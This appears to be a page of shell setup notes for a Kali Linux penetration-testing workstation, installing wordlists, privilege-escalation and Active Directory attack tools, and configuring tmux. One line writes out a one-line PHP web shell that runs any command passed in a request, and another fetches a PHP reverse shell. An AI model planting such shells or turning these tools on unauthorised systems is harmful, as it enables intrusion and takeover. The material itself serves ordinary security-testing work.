Skip to content

Kali

init


sudo apt update -y
sudo apt install -y kali-linux-default
sudo apt install -y jq
sudo apt install -y lftp
sudo apt install -y whatweb
sudo apt install -y gobuster
sudo apt install -y feroxbuster
sudo apt install -y smtp-user-enum
sudo apt install -y html2text
sudo apt install -y exploitdb
sudo apt install -y fonts-hack-ttf
pip3 install pip --upgrade
pip3 install setuptools --upgrade

tmux


version 1

sudo apt install tmux

echo '' > ~/.tmux.conf
echo 'set -g default-terminal "screen-256color"' > ~/.tmux.conf
echo 'set -g status-bg black' >> ~/.tmux.conf
echo 'set -g status-fg white' >> ~/.tmux.conf
echo 'set -g base-index 1' >> ~/.tmux.conf
echo 'setw -g pane-base-index 1' >> ~/.tmux.conf

echo 'PROMPT="💀%B%F{39}%d%f%b%F{8} ~ %f"' >> ~/.zshrc
source ~/.zshrc
version 2
sudo apt install tmux

cd ~
git clone https://github.com/gpakosz/.tmux.git
ln -s -f .tmux/.tmux.conf

echo "" > ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_main='\uE0B0'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_sub='\uE0B1'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_main='\uE0B2'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_sub='\uE0B3'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_left=' 💀 #S '"  >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_right=\" #{prefix}#{mouse}#{pairing}#{synchronized} #(if $(/sbin/ifconfig tun0 > /dev/null 2>/dev/null); then /sbin/ifconfig tun0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; else /sbin/ifconfig eth0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; fi) , %R , %d %b | #{username}#{root} | #{hostname} | #{IP} \""   >> ~/.tmux.conf.local

echo 'PROMPT="💀%B%F{39}%d%f%b%F{8} ~ %f"' >> ~/.zshrc
source ~/.zshrc

/usr/share/wordlists


Payloads

sudo apt install -y wordlists
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

sudo apt install -y seclists
sudo ln -s /usr/share/seclists /usr/share/wordlists/seclists

# sudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O /usr/share/wordlists/seclists.zip && sudo unzip /usr/share/wordlists/seclists.zip && sudo rm -f /usr/share/wordlists/seclists.zip && sudo mv /usr/share/wordlists/SecLists-master /usr/share/wordlists/seclists

sudo git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git /usr/share/wordlists/payloadsAllTheThings

sudo git clone https://github.com/insidetrust/statistically-likely-usernames.git /usr/share/wordlists/statistically-likely-usernames

#sudo git clone https://github.com/soffensive/windowsblindread.git /usr/share/wordlists/windowsblindread

/opt/linux


sudo chown kali:kali /opt
mkdir -p /opt/linux

echo "==========> Linux:LinPeas"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /opt/linux/linux-peas.sh
chmod +x /opt/linux/linux-peas.sh

echo "==========> Linux:LinEnum"
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /opt/linux/linux-enum.sh 
chmod +x /opt/linux/linux-enum.sh

echo "==========> Linux:LES (Linux Exploit Suggester)"
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /opt/linux/linux-exploit-suggester.sh
chmod +x /opt/linux/linux-exploit-suggester.sh

echo "==========> Linux:Linux Smart Enumeration"
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -O /opt/linux/linux-smart-enum.sh
chmod +x /opt/linux/linux-smart-enum.sh

echo "==========> Linux:Linux Priv Checker"
wget https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.sh -O /opt/linux/linux-priv-checker.sh
chmod +x /opt/linux/linux-priv-checker.sh

echo "==========> Linux:UnixPrivescCheck"
wget https://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz -O /opt/linux/unix-privesc-check.tar.gz
tar -xf /opt/linux/unix-privesc-check.tar.gz -C /opt/linux
mv /opt/linux/unix-privesc-check-1.4/unix-privesc-check /opt/linux/unix-privesc-check.sh
rm -rf /opt/linux/unix-privesc-check-1.4
rm /opt/linux/unix-privesc-check.tar.gz

/opt/php


sudo chown kali:kali /opt
mkdir -p /opt/php

echo "==========> PHP:shell.php"
echo '<pre><?php echo shell_exec($_REQUEST["cmd"]) ?></pre>' > /opt/php/shell.php

echo "==========> PHP:r-shell.php"
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz -O /opt/php/php-reverse-shell-1.0.tar.gz
tar -xf /opt/php/php-reverse-shell-1.0.tar.gz -C /opt/php
rm /opt/php/php-reverse-shell-1.0.tar.gz

/opt/windows


sudo chown kali:kali /opt
mkdir -p /opt/windows

echo "==========> Windows:SysinternalsSuite"
wget https://download.sysinternals.com/files/SysinternalsSuite.zip -O /opt/windows/SysinternalsSuite.zip
mkdir -p /opt/windows/sysinternals
unzip /opt/windows/SysinternalsSuite.zip -d /opt/windows/sysinternals
rm /opt/windows/SysinternalsSuite.zip

echo "==========> Windows:PSTools"
wget https://download.sysinternals.com/files/PSTools.zip -O /opt/windows/PSTools.zip
unzip /opt/windows/PSTools.zip -d /opt/windows/pstools
rm /opt/windows/PSTools.zip

echo "==========> Windows:PowerSploit"
git clone https://github.com/szalek/PowerSploit.git  /opt/windows/PowerSploit

echo "==========> Windows:powercat.ps1"
git clone https://github.com/besimorhino/powercat.git /opt/windows/powercat

echo "==========> Windows:Sherlock.ps1 => (too run type: Find-AllVulns)"
wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 -O /opt/windows/Sherlock.ps1

echo "==========> Windows:WinPeas.bat"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat -O /opt/windows/winPEAS.bat

echo "==========> Windows:winPEASx86.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx86.exe -O /opt/windows/winPEASx86.exe

echo "==========> Windows:winPEASx64.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -O /opt/windows/winPEASx64.exe

echo "==========> Windows:exploit-suggester"
pip3 install wesng
ln -s /home/kali/.local/bin/wes /opt/windows/windows-exploit-suggester

echo "==========> Windows:kerbrute"
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O /opt/windows/kerbrute
chmod +x /opt/windows/kerbrute
sudo rm /usr/bin/kerbrute 2>/dev/null

echo "==========> Windows:kerberoast"
git clone https://github.com/nidem/kerberoast.git /opt/windows/kerberoast

echo "==========> Windows:kerberoast"
git clone https://github.com/szalek/Ghostpack-CompiledBinaries.git /opt/windows/GhostpackBinaries

echo "==========> Windows:bloodHoundPy"
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
mv /opt/windows/BloodHound.py-1.0.1 /opt/windows/bloodHoundPy
rm /opt/windows/bloodHoundPy.zip

echo "==========> Windows:SharpHound"
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip  -O /opt/windows/SharpHound.zip
unzip /opt/windows/SharpHound.zip -d /opt/windows/sharpHound
rm /opt/windows/SharpHound.zip

echo "==========> Windows:AzureHound"
wget https://github.com/BloodHoundAD/AzureHound/releases/download/v1.2.4/azurehound-linux-amd64.zip -O /opt/windows/Azurehound.zip
unzip /opt/windows/Azurehound.zip -d /opt/windows
rm /opt/windows/Azurehound.zip

echo "==========> Windows:Snaffler"
wget https://github.com/SnaffCon/Snaffler/releases/download/1.0.103/Snaffler.exe -O /opt/windows/Snaffler.exe

echo "==========> Windows:PrintSpoofer.exe"
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe -O /opt/windows/PrintSpoofer.exe

echo "==========> Windows:RoguePotato.exe"
mkdir -p /opt/windows/potato
wget https://github.com/antonioCoco/RoguePotato/releases/download/1.0/RoguePotato.zip -O /opt/windows/potato/RoguePotato.zip
unzip /opt/windows/potato/RoguePotato.zip -d /opt/windows/potato/
rm /opt/windows/potato/RoguePotato.zip

/opt/tools


# sudo rm -rf /opt/tools
# sudo rm /usr/bin/enum4linux2

sudo chown kali:kali /opt
mkdir -p /opt/tools

echo "==========> Tools:impacket"
git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
sudo pip3 install -r /opt/tools/impacket/requirements.txt
cd /opt/tools/impacket/ 
sudo pip3 install .
sudo python3 setup.py install

echo "==========> Tools:finger"
wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz -O /opt/tools/finger-user-enum-1.0.tar.gz
tar -xvzf /opt/tools/finger-user-enum-1.0.tar.gz -C /opt/tools/
rm /opt/tools/finger-user-enum-1.0.tar.gz

echo "==========> Tools:cms:drupwn"
wget https://github.com/immunIT/drupwn/archive/refs/tags/1.0.4.tar.gz -O /opt/tools/drupwn.tar.gz
tar -xf /opt/tools/drupwn.tar.gz -C /opt/tools
rm /opt/tools/drupwn.tar.gz
cd /opt/tools/drupwn-1.0.4
sudo python3 setup.py install

echo "==========> Tools:cms:droopescan"
git clone https://github.com/droope/droopescan.git /opt/tools/droopescan
cd /opt/tools/droopescan
sudo pip3 install -r requirements.txt

echo "==========> Tools:enum2linux2"
wget https://github.com/cddmp/enum4linux-ng/archive/refs/tags/v1.3.0.tar.gz -O /opt/tools/v1.3.0.tar.gz 
tar -xvzf /opt/tools/v1.3.0.tar.gz -C /opt/tools/
rm /opt/tools/v1.3.0.tar.gz
sudo ln -s /opt/tools/enum4linux-ng-1.3.0/enum4linux-ng.py /usr/bin/enum4linux2

echo "==========> Tools:chisel"
rm -rf /opt/tools/chisel/
mkdir -p /opt/tools/chisel/

wget https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz -O /opt/tools/chisel/chisel.gz
gzip -d /opt/tools/chisel/chisel.gz
mv /opt/tools/chisel/chisel /opt/tools/chisel/chisel.elf
chmod +x /opt/tools/chisel/chisel.elf

wget https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_windows_amd64.gz -O /opt/tools/chisel/chisel.gz
gzip -d /opt/tools/chisel/chisel.gz
mv /opt/tools/chisel/chisel /opt/tools/chisel/chisel.exe
chmod +x /opt/tools/chisel/chisel.exe

  • Pentest Monkey: http://pentestmonkey.net
  • LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • Linux Priv Checker: https://github.com/linted/linuxprivchecker
  • Sysinternals Suite https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite